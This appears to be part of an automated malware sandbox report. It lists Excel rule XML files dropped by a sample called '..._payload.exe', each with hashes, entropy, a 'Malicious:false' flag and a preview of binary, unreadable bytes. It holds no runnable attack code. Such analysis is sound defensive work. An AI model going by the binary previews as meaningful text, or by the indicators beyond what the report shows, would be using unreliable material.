                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):950
                                                                                                      Entropy (8bit):7.800075365331289
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:2Wfx84YxvDla3Sf5UGNCygrlGx5IDKUkPDIFiqv6bD:H2/35Rsm5HUe0FiqwD
                                                                                                      MD5:FD8077303F33215497961109767FFC8A
                                                                                                      SHA1:DE5826909E4490318E98C0233D92C33CC841C837
                                                                                                      SHA-256:FDC84059566E2EAF09261BEB180617B7A672C51AC115AF46625B938948367B2A
                                                                                                      SHA-512:21A48CA4C9251650E80AF1CB59389227B190E0BAB5FD9C232DA1409B1CD5EF7CE34B60A036E147991FDADEB3BB7953DE5F378AD640CB5190F872E6AC6EA139E7
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmls.y..B..$...(...Q0..%=..u9.:Ny....YB....~...9.i..9.].(D..f....p.g..yp..8....R$.pvt*C...... S4......+<.Q...O._......*.Kh.7...?....>-s..s...0..R.B.)+.....v^..c..6.ME....{f..I...#..A....?V.@I.#f.....P...k....)6.Jt....2.(8..`H..Q.s.....\3&r....Z*/.d....R.......T..[H.i.....q..M\.?c'...%...YIum..-.F.<3.W.>.L..:.-...Xf......|.A....E....<1.QN.Q?....(..ph.$..P..Vj(H.<C.M..+....6..4X..G..7.f....S{.zA....r-q.h....-W>..E..r|.e..$.sa.........Q4-...gG.,._...g_..C..M..(...`/...X......Z........6..%...C..lp....'.K.36.x-....A/......t.U.)..F..=NK07..*.;..L..a..>.u.5Y3Oe.e. n.-M...q5U..".k.u.zU.}.y.>+.A...L......0:bgM.D..R7!7.E^K...B....T..]b....R........`..........:A.MW.{..."...N..L..=....m.......K[.....EY@J...S.oe.(K....33.. ......y.....%.l...]..L=6..CS3{^..,a..t.......*.f....k<Db.x...P.gv....y...+......em....N.-Cqn.\.DhZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63063v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1125
                                                                                                      Entropy (8bit):7.804022784751216
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:JG0828YERMGGuutEOIvXm0C/9bxL2wFOn0iv6bD:yNMvAPU5FowD
                                                                                                      MD5:12DB084426EB29042F190DF69CA9D025
                                                                                                      SHA1:FFF47AFF2750FA89E806B313DB5C4C780234D431
                                                                                                      SHA-256:57B1E1CD73CC6CBBA190DCBF1AFB205D77F806D23588AC06320F7176F2BF1E10
                                                                                                      SHA-512:C358AD4087F397B712EC001D9CA79E1B820510353E1C1E1AF8F285915F7F71BE761C7209DD15592137905B9D304467034C8C2FA538510D3A247D35E4EC792295
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlRL.......[.T}bF..... .....s'.....$..x`....2.R2...*O..}C..H[,.5.....9.[|T..s....^S.4.e.3..Sl#.......d_l..P....?..>...,..3!..."." ...q.....@.:.L...U...`[y...s..<...9..(...g..@.-.l......'...-.(X.*/9....Nl.O..MP..p...{..1.s..S.....T...4.)|..N;.9O.&M.....4.....)a..X_.....A.R..2.k.....>...`...{.U:3.A..0CK...%.....:.T..C...>sO#4M..WQ..i....l.7....S.N......A....Mc.W!.6.N..6.0.w..,.Y.-w7.....J\(H]..&.............=...?......%..Kb.X..]..0..'j..Hy,...<).....,.....,v..J..U.9K.P./..,.[ .......]Qu....]. .:oR.......)W......94e..=Q.4....$Jf.5.q.wD.v.Z..r-^...'.,..\T/P..y.....O.%..%......v......6|H.a.Y...-.N..Wk.).H<.._...(..9._.!.&.w...../.....&aU..n.....J....-.<.y..|9<...........>..=K..7~....5$.....,_.g]...a..$...5[....Q.F28....O..U.R.N...>.PW..W.4`..".;=.x.L.o.6YC.1...6&..9.....s.N.cAY.*....X........u.q..._N.!-.w... ..*<Jv....qc..m.H}....O..Z.>...i.....l.O*...s.@oS..s.,,..t......f.e..w.#....G..M.v.R...N.b.p.R..W.q^.h.P\..&.P...#..X.C.....X.AQd

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63066v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1121
                                                                                                      Entropy (8bit):7.855007359505162
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:G0WWH9GrYjKSjJRcSePbPQWbQQbd7hNhvRTD0iLv6bD:ZWU9GrK3wd7hNhvRTTwD
                                                                                                      MD5:B86EC475EEC32C3E70F32CFA90F94BAD
                                                                                                      SHA1:1E9AAA81F65B655C41DE32FB3A24B560329C08EE
                                                                                                      SHA-256:C436D28745157469B83E174600236029AF1C987969339B6D96E02BE2ED520604
                                                                                                      SHA-512:0754816AAE45B42D2D3D5F5CC92DC0D610039E7E73D11990DD665F85580A968F123460BD945DF244272251B88B7C8AFF849790023D9E9A1D31F683802BF85C1F
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlJ.."e..A.....~eg.._,V...x....m.{z.......+...\H...#.L....N.K...+9...1V=.iy...rk .-g..8E...c..x.."....|.x...f..'..o...[..p..b....F....E8.u...g.8.;A...tJ...A..h....Bc_6..w...G.*...y+...[.77Vjd..{...C.(Iq..".(..|o.|.../..W..(._H./.X...rl..*........ ..x.C=..J2:F...Z....B.....4..!.b.,-.....@.3c...\.:o.$.F.w......,Gm.....v...(r.Ns..m1........{xX..X%W..Rp{.....P/...$GdR...)..!+.....lO.&7.NAl....;....`~.B.....o.3...i..f../.;#W..m..Bs.&.~.UzQ..j...L..l.e.=MQ.R.........@....y.....5....#/.>T...]...F...e........R.........r/.6. 4...X.6.....7......:...W..F.F|h.q..{.F...YS#.,..............N"4... nM.V.....F^.....O2....[;.....;....V..Sq...n..p.MLj/...U......`..m.../.O*6N.^$.~...{*G..w<........_48!EVM...sq.j...Z4Y...W..q.i. j.0.'.@...0._'H......d1._B..>!J.....P,-6.BG.~..tu'......7.!...a..|..e....}..i.y...F.bii..$.5..T.Ti.l.XA..3.hm$U...B.:.....I....h.....q.@.AGi.5.J\..y..U"#.-. ...&..b...Nc..j..=.j...$t.xq.."...a!CL...oc.Z.h..@....t.[.....O.....f..vg....3....

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63067v3.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3109
                                                                                                      Entropy (8bit):7.936397340018651
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:f1l64j/wuCAS7S6RyNGSmfItBMBw+EFRhRawbr1T0T+vEM/W26ZVlpIQiEe98GnQ:f1lxoZWRGSAY/RFoT/GW2kVnVe9cXp
                                                                                                      MD5:E9BA62B9F07645465C9F5FF434EFDCD8
                                                                                                      SHA1:9331DA4BFE38512FBC5A44B4AC771AF9215C74C9
                                                                                                      SHA-256:112E648BEC2E3B53058DAA564162D07C73721C2C5E9C7D705D57C2A2EDD3BDB2
                                                                                                      SHA-512:ADB5A2A5AA839EF788CD370EB37036F0F56774916264C0BB3104D3F05ACC415E5F01243C0E3842B3AA37059C4D7963C36A16B11774B04CF61F4271650A12E9E5
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml....{.......T;.}.....-4L.....\....t........WO.....m/.7.@f..........-t.f....cE...e`..I.8.-......O.0.....$....."..r.....=...p.jZ...Z....mb<R3_(..9.{`}\x.D.@2.z...7....%.................OQ.h..5 1..@EL.............."......XG.eM...h....`.....tR...*.....7Po..y....b....g...).......1a..Di&...s=.........H.yo....H.T5.E7.$.HC....i`....$V.....x..+......V.Cw/c...N>)....Z..7~.wA........Q...l./.h.6(..T....V.'0.@....}....Qp.=....S....a.%.Z.{...........o.i.....a..Z.BZ.cs"m.'(hU.2N....FY-..x........=.....6...j...A.c?r4...E.Q.h.Bo)4......:.:..;..u....!t..=..\>..X......V..NBo9).....q..<Y...PP.e.lw.B..."#.D..Gl$.\...V.?.dX..N.T.R$..02.{_.....62..c].<.....i>.S..Pn82..=-:.3.Z..v.}.G.%.R..v%@d.L...Q4ky.&a0.4;..:U........q.8.~..Z...........5m..o..+e...{..)....7..OG..4J...4.......R..i>0..6>.<...J.q['.:z.n.p.o..M.O..iJ.x.L.....m?.[.............6.....LN.=}..^.Oo....NzS.z...q....G.....Y...?.Y.*z...yo..t...Z...[.Id...U....m.)GHR.@...8:.............-i....1.kqn

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63069v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2126
                                                                                                      Entropy (8bit):7.904461420078446
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:ozjwJzqz1RSz60HioPTahnr9Z9owQaTgV7GJZYwD:oziSlYiorsnfnj8V7Gt
                                                                                                      MD5:08E01F15215F415B1187492C44970CF9
                                                                                                      SHA1:F8CA3C98081F744C630D56E9030C585A22073D0F
                                                                                                      SHA-256:4DA58244C60FBA2EB5C19DF0CF987F662B9F254E0612553415A263DC4BABA3AC
                                                                                                      SHA-512:FC8643142456E64ECFFC816490F6C755B5757D1F76EE3B5B10288ADC76E143B6638EFF4C58299CBAB6ADCD4A9DADEFF9DAE77BC862F7CE2E4D8BF73E9F926E02
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.^R.S.].../..7J......<.L..v.....U`P.3.{..U._..%.'=..7.Px&..l..........4..}..b.`V.!.g..|..e.w.B....N6g.D.#x...S..E.;[.....l.Yxz...6...I..6...._......<.I.r.lE..K.....j..,....r.DW.p..5..a......*.......:5f1.b.w.B.5..}8.W...hJ.....3..;.._R.......X....Qd...5g..4!....+u....1...{ =.}G....k ...D.pXw.blE.k.....a.CO.m.W...c...zY.....1....$*..f*.L.a-.KY8..w.:.t?.yV.q.......&X.mt.......4.p-tV3.tr.....Is..c7...g...\........AAog..u:..F..=...+.......l^.......<.........1Ij?.3K-..Aj..k.....b.-A..W..:.S...FZ.?.4V......H.j=.Q...T..\+.*.........j....s.8Y.\..H.&...z7.9.;.c..t.x [.".a......G......HZk.M...H.B_..N...?.....f..l.....X...'...b8..R..D.z={...ypE.-...uJj.M.~.n...bY..:..t.L)}...r.1.P....y.i..m.&../V...._Wn.8Y<.x5. ..h.Qj"6..|..s..c...;.p.....ou$..Iz.Wh....Q.9.0.....p.A.B..4O..1tN....9..U.hZ.,s......+.e..u..j.......<.QbO.T.{...J..[...}.....T.z(k..@..4...j}].Y%.....~.R=.1D3.*...cR.....W......Bg..z.......q...J..S..4.".T<..y....OX.\z..+z..?..r.fa...

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63070v5.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1387
                                                                                                      Entropy (8bit):7.853352149117355
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:YEJirPsMQ63SVRCVrd7BxSQyBuPyAuOl9TT4fC4vGF2lnVm84lh7gD9LyUG3RBqA:zYsESVREr5GQKULn74Bl8Plh7ggUKB+s
                                                                                                      MD5:0C07F9C056C0C1E4D56401A6D65280C2
                                                                                                      SHA1:003AAD135B2926840C6C0AECAFD7B37B791885DB
                                                                                                      SHA-256:8FEF3B18F715E93FB4D2BAEEAC5B44620B88C97AF108417AD7869DC03A66E089
                                                                                                      SHA-512:49F4D79A81C1226EB410AB379E19B16341B8793C05B39C97517EA3BB09535BF63B8787D6FA67723D37CB90F60A2B553F78522E4A0A65A1E28CAFA2338D753113
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmle[..0@..../.[.P..p....Zx.....Ij......^...?.OAk........8*[)]....!'..C}.7..w.Xb.Um+..u.`....B..*.......P5..>.........H.a..&.....tBM..!.F..{...}@.6j.4p..sy.h.E..9..N ..P..i*..l..[.Wjv../h...].C.."OM.O3...:./.Z..'>...k}....|.....j.W.=.c.v..~F5..<A.{...Z...g....#.W...;..d..?....tX..n....@.[R.`...v\.bD.......{.P..9......yI.y...~_A..p5.q..>p=..:....k...$..O..r..%.ua..I.....KZ^.P.x..W...Br...t...fl.E$5..6..0.g..........m..K"..a._..wja4..DW.....(k/...J..k.oUhf\./.CI......Ky...(..|....o..L.......0G8sF.-.%_k.{.?...2.s...~...._....*.0K.1.6..k.....'u.rJu..tXSE..........+0=s....=.BR..........hC.5,^.....D^?Y.. $...:-i/.#u..hU.rCG..y..]7.K..c.....\.+.W.."..R...*..9".9..x.6 .J.)..I........7.Eey..k.....,..+../.._.......9.n.B.....K.._CL..x.j\TyF..~<Iy...gt..j[....D.........M.f6.jE|<.=:.........Y7...........^..h..E3...?....~......s.@>.*j....F`.2.....i..[.A3.W$..tu$DKu..C......U.%..1..|.i..J...........C*..}.i=...T...3}.L`l....?....n[...

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63071v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):754
                                                                                                      Entropy (8bit):7.713337848458679
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:/0km59yFSs3zU0wZIZHuK6XBJ3C8QHkHarHg/lr5kkAnEfyW3NLAeno0H2vbA2S/:cF58FHU0wZkH0g8QHkWCFlyWz6jLv6bD
                                                                                                      MD5:D4D39076C4F078A75601A2CFE0A75B44
                                                                                                      SHA1:E4B7FD895ED7DD24BC37079ADD1807FABEEF2403
                                                                                                      SHA-256:5221028857BCE3D3AADF1217EBF7A8D8B99A21B201974055100FBE5393D0E7D5
                                                                                                      SHA-512:D938346CEAD308E00F82AD037E99FD15D065DF3AE07CEBFE5287BD3A5C460F95712D441AFAA0A22CB1EA6345AF1690F070863CC6D3E56546FAFE2EAD4FF4B3A1
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml....."....E=..)..dO..J(...c$........X......I....u..l.R3*.8.........".....8...R....n"O.\X..E..N[}.p@.;x.)-..R(....#...m.....AQI\YW.....;....$zk4.2:.zC.!:....C$..v....z.#.i.]...j%.qe.K.[..fx.q..^1.i.`M..50...Q5.F."..w<).Hf.....6k`...pD.;QU(...&)M...F..1..a.{.....7FS...?...Y..@.F...,s(y...R.;&B.I....2..=.?.MG..u.n....\B%..@......':j...*.."..Y...u.3...;....Td~V..-'...+..2>q.{E....s)..W..*:.;......t...>......._.......z../hf7.=.r.?...)..x...I.t*.W.8.wN.............c.....v9t.-...5.Z..=a....=.....]0.G.. uc...N.mJ0&...D...4.. vv...N7m...r..cp..n...P.....C%.&\ae{..GOK; .)_Y....G"......&N......N}....2h...4._1E.w+..Yg..zl..~N.)...t.....hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63077v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1399
                                                                                                      Entropy (8bit):7.829981636568776
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:j4XlpaEY9ktyY0nWm+xePRztjDJCAp7YWYaPmPUEOXBIPYRci/yLv6bD:YlplY9ktyY0nW/eZzl17/muRIPYiiqLs
                                                                                                      MD5:726BD28A9A7EE544E5088D30F2B72301
                                                                                                      SHA1:805B78D4E4652DF2BEAAD7BE1A07700F319B8188
                                                                                                      SHA-256:DA7E562E396C8C5EB78E74C2EDCE5C3743E4615C9208095197FCD3F48E687360
                                                                                                      SHA-512:8264CE090066F8DC62E58B46811A31340D93861A58ABE9E1724FFD67881999F49519E043B33A3A77A85CF52561C4523A60B60099AADCD01961A594937E813293
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml*L....cVe.+'.e.:.c..-N...&T..@u,342...IaZ..0V..dr..}..&.....w...q.T...I....".r...A4.$.:....A{...!L.7......"...d...x.[...U...Q,.!}Cn..!h:.O....l8H...V....{M....].l..kf.^E..i-.[."@.J@}..~#z..Ax.4B...O.dN.|75..sCj...fj..8..BH.,0..e..n.jT.x~.I.P.-.A.....j.|%.+.-?..=SN...ko.L..m.;.:.H..]T.mAjK....(-s.;.(r...9.}..G...T23. ...}.XS..{.V.....F...x.,.>.ZU.~k..!=..;.>K.f.U..*{,s.J...y.....oN..Ml.b..Qg.]..7n...N..#.../...B.0=.".1z...2..B:...,G..h..je_.`....*.....\.4..{...-..Emk6.2..|..:..].".K......d.........@..i..i7......a....5/.+D.#0...L..X..4...Ul_.O...ot.@..3.+H...$.....84..=<.......?. ....1^.Zy:@..5....JX..7..8w^.X.'.7...^B/.J. ...9J.F....X....Nj.I.-F...U...r.(.U...9...t,..'.....pe..u....k..dN..t... t..(&...L.T.!5\..E.h..n..E...^.....a....>.c...&F..;.I...t...<...&S.5........Q.a"V.To.@.AI.f.......Q..>....N..H.....7L...e.P....n.R.....O..a....%va.j&q.3A..`oko.[.a}OAh,....<.%b.v..6V&.>..!.PE8\..:...=..r.?<...F$/.8.........k.5.{..C..5:.b...W

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63078v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):708
                                                                                                      Entropy (8bit):7.664846794126919
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:ImRl3//Q2gIKAwwy+ebVmm//1yuNabmGorAmFU3X/mUgkP6iwpuub388v6cii9a:IkBw2g+y+qVj44gmTrAmFM+Zrfpuub3A
                                                                                                      MD5:5A8C1FE2F47B7A0E6BD75DF20333BAF3
                                                                                                      SHA1:26D80D019AB6C3D7117AA9F4BA806AEE19ED30A6
                                                                                                      SHA-256:7BF1596BA9C76BF7BF11FD0A15E27F786F70E4D6FA8255D3280AAAB97C1F5B7E
                                                                                                      SHA-512:39FC36FE37C7B9844E07AA9A0D7EA502BCD5848F414D5E11476394E5A588AB37E5B59B129EA155A004733359C1F941245ADC30F94EE1A56159C9820D5D49756C
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmluXb...4.G..7..z.1........v..jj.....2l.z.5.yr4 .b.U...D./[K..!g.'..Q......*..wE5NN/...-.+.M...D.iC8..:.FZ...*.s.../...H..?k..S....m;vz.lo.CHr.w...F.:.I..Q!..z.p[...6....7.. ...)N.1.A./".N.......1..(.".s..N.f4.!*.q`..x7{...a.Ond.....".v.......^,[-....Y....,.....mpE...5.[T....)B._...>.[V.O.#..B.IM... ."S. T..+...|......`fE..>....].?a....q....P...u....Z.Q.uZ...*rf.8.s.UQy..q.....ss(.?.P.>TE....4#.'@....F...$...D^YO..-...8.D..m6^..|..".ZU|...I.-.1IO.%.9.{.:.E....?s:q..r/.(......s.\e.x.....d...!"K.S.0L\T.1....."....$.....9.>....B............#..-6..#>.*...,...*..$.V.......&.0.....0S.4.x....CT.y.hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule65136v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1132
                                                                                                      Entropy (8bit):7.814675729604611
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:ipwgJqtnCYHxNO1ioVcDGunVcB8k8AXrdUcBi4kGIyv6bD:tgJanC4ueDG2w8k8ARBiRKwD
                                                                                                      MD5:A9E2F28B50D080EACB39B838D8D8D870
                                                                                                      SHA1:5BF3480AFBD925545105564F2EA54FA8E0EB4801
                                                                                                      SHA-256:740A177251C994F6178E96BC92BC0EBB8D700C2277DC5C89DF7D7487E479821A
                                                                                                      SHA-512:9A28DA6E8ADBE3E46123945EEA804ECFDB779348338649838442C04B60FB3C45EDA7025019CC47F7B2A891101A1DA501C6B66A4DECC49CB30630BD79340DB8EA
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..d|..$..De...g"e.....l<.}j.t3p?.&.i..Q..[..>2..n...}.....Z...oZ.F2.q.a....K..,..s8.~8m...V..z.BK!.S.V+W..J...Jx.OJ.z...Y..k...s....T.i..Oe.......TSHq.+I..._..*a.....#w...N....*.~ +2..X./..S.e2,.$.E./=.2..En\.n..%.....6..5.V...^.....;...c!&Cr.:.c7i..>.....\..6.#%...uL..c..K.7..Z.D.4........N.>...>..X..+D(.8....lE...J1.$J.sx^...t.....q.Z.,..|.V...a..~..mI...T..-.q4L..6.b.x.f&.5'.dx..........\.i....s......Q..X....%....i.+.7.P(..v.......7).",...H.QDX......16.x..0.M8w..r^...j..q.._.G..a..........@+..{H.....R.\.).w......L.^..P..GlcNJ.x..x?...X.#.i.m....^DM&..u:e..^=U.?U....1L..........KS.....hQr............PZ5`....0....~..9Yxu.'fZ....gS..P.~.0..N......`!..>a..".x.5.....'...y.v....Z.G.....D.I._...o.4\.~...._.....*..^~.o.bM..~k.........._e.].s.Z.b\`...j..*J......R.,.;.0?Q....4...}........%...Z.$...o.&9..5=..Q;..A.o./....?.{.......!.c.2..........o.R...?...R.D.X.s......q..xd.[..$ae.1..<!......V........q.F....w....B.6..>=....b.s....J..O9rEt

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule65137v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):752
                                                                                                      Entropy (8bit):7.723582617627382
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:C70MAbcKSjZSXyKDmh/VieaFaKCBtkO7nIRh5PVL4jDg8kSHov6cii9a:E05QN9kyMmh/XRjnIkASov6bD
                                                                                                      MD5:C6880EBFB7CE9E350A78CE0C0CA0DCC9
                                                                                                      SHA1:F9AB0C345F9A12E0D5DB5EE4A543129C362534CF
                                                                                                      SHA-256:BA1F4C4664E70855DC6AE599A76D1612E43FB0F942D5C2BA13969F578CBAF8D8
                                                                                                      SHA-512:4ED5DB0F581DFA905EF88B76364DD3874381C243C972A69CF8818DB2709978160AFBE6B84FAF5450A23805DBC7F40FB7778851DE35A913F1D6122F96AD8FE33B
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..j..I..D..1..t..X.Z.@...Z).A-ur=.:s.j..Ep;z...&..S...O`..S...TI..t.;p..I2z.Q.._.[..\tvZ..[.. ..Eg'l1...w.q..0...~..]l......M......x..U.\.31.....Tw....I.....wQM..)R_.~..P?..U.....f..(.6Y..n..&.|..Tim...K.....7#B..[...E.......&.{..z...L..c..........Dvk.............!......p.o^.W..Q=...... .f/.F...AR..B....8.->.W L.p....I...C..Z..ps(.:..W(.B..J..ix..^`.S...@!.~e...K....}.e0.Z....]....V^..AH.W.......$s...._.v.h......f#........~..=.S.....U.U(W..4q....%....Ek..\@...YsV.}C(0.../.e.I.DmGk...D).....cF.%.R\.05...a...A.?.}e./'C.u'.L....j..h..2z.o.I..{>~}.^..+..S....z.&{...z.:.h...M{....y..(.n-.....s...k..(`...2Gr...X.......Q.8....rS'/.hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule65138v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1094
                                                                                                      Entropy (8bit):7.8013113815658715
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:FKry0Ez1mZfzd+xpTC9h7NdOXh2uM2blorjqscwYD1v6bD:I6YZp+xpTcFO0uyMD1wD
                                                                                                      MD5:E7BB4F8188C2ED23EA436F247AF4E0FE
                                                                                                      SHA1:83848C390ED9C39ACCC837CE3DD077C862679528
                                                                                                      SHA-256:6E5E0348B5F7EB48F71714E328C294CB3F7B0337981DFC223AABD010540A01E9
                                                                                                      SHA-512:EF9D1982D9F3415E57AD851A57A856E1D1CC98A9E37F1DCC74B09839F53B229A25EC9A825F103430985F695E7D20CC1387C819576930013AF512522B793383FE
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.7.t-.7..-.6.!M....+b......?z...\S...r....)......k....1...\..v...H6..7......1H.%.+..@"...G..._I?..VI,..$9...s.L.A.H...9.3..1W.......N*... .,...^..Q...|........HZ4.m.....D..:.D..8....`_.$...z....r...w...*iR.z..|k...=.G....6......0...w..H<V&.h+..[f;./A4...Z.]C. .z".x..}ZnD.>.K>...2:.T..YK....#.R.+......n(..v.Y..,Bb.E..._...c.t.A.6...#Nw.....H......&.\....f.oIaZ.gH.Hv.3.xC...1...bEp....ZD.{.e..o.%K.V...A.(;.5lg.>\...0..jV.....[.u$.y8.>........T.'.....,d....L5.....n.z.6c$.w.H......':...!.3#.-u.@$?."G.>..gh........H..0.B...)...i..#.0z..g.`/...jE..B...Gl..W.]....z.....R..ixy..v(....!........>.>.t......Nr.Q@.X..0.E.......[...5...K..N..Q.."P.....f..4B.(...D6.H.E.....`.o.B..+...lZ.jD.>B%;X....o...F..6.T...2.<.........j..[n..+.L...a......,).*>....Y..?V.Ao....~.xiA...P..@...$.....~..P.c...]......l..M\...T.......~F4.....y'.+y3.(_.IK.`...6.Ds.4.......m..h.s.c.L.7.?.y"....}..`]X.[..)..<..@^.......E......R.<y].....4Sy..Wsj~.k.....w8.c..M[wt75`sz.N.v

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule65139v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):8095
                                                                                                      Entropy (8bit):7.976702244523413
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:nAhh4nCi+hd4r7lYBG+rQBXwmeURgXeh/tAvMBjX:A74nCfAl+G+pURUefxBD
                                                                                                      MD5:B421615226476EAB66438E21F49AC943
                                                                                                      SHA1:F4CA0CB6CBFBD3F39DA9341EB2C014198CFD8353
                                                                                                      SHA-256:36148D11B01249FDF5EB0899D541AE1159B3FC0FA7B4182508E3F17EFD084864
                                                                                                      SHA-512:3EC4C1D0D2B98BE0A2FB2F6A085F54D18CACBC4488257D434D182F3CAF30149AA884727D87F90E42DD70E0C2C630BAAD406C682E9934BF7F3871CBA114252955
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlP.KK0y.O.Gn2jz..P...]o/`.R..aw.ir.;h..%Hl...1...J...#..#...W........".~P..y...?.....`..i.'...<...+.Ct.bP..%..Y..D.o.(...F.....W!&.......5).e$F.._.'w....K;.)?2"v......f.Y...1.\#d+.:..e...+..".......e.u....l.=+r..bN..r.O....nV.L.r...u....x..yM..t.+.H..atF.b.x..f.35.'9...[yDA.4..r..}..2...".....d.U.?}"y.`./.f..@.>b.c.cS}.@W..!. xh<.Z..ei`..{..$.S...Zaa.qQ....e..I.X/_gu;65.....9_....w.J....T/..{...3.h4."..1<....$vJ...~.r...:.q...kT..ba......46...c.....3.N.....Z.Y.. ..4.....c.....c~4..D^8..X.K...U..x..&..4m.B-V..|.....d..W+..g..5..b....~A.j.....'dO..8.....k.H...M.1..5..Y...-..@{.5..t.h...Q.......d.....5xL...)..{Uoz..P......V.J.\....5.C..D@k5P..)...+../.t...|.f.=.5..{..w..p...o... r0f.*a{...l../..>..r.C'.........*....7.lr7....:.wRI.Hu....Blk.^L.E...T..1...x..+..g...6P.........&..+..|T...W....p0E.}A.X..C....U..s...C....Q..d[k.}..B......g.N~N9.l....dp}...;...c$..m..................%7....|..0S93...<..j`....~...X7...\....2.9..*...!..3D...

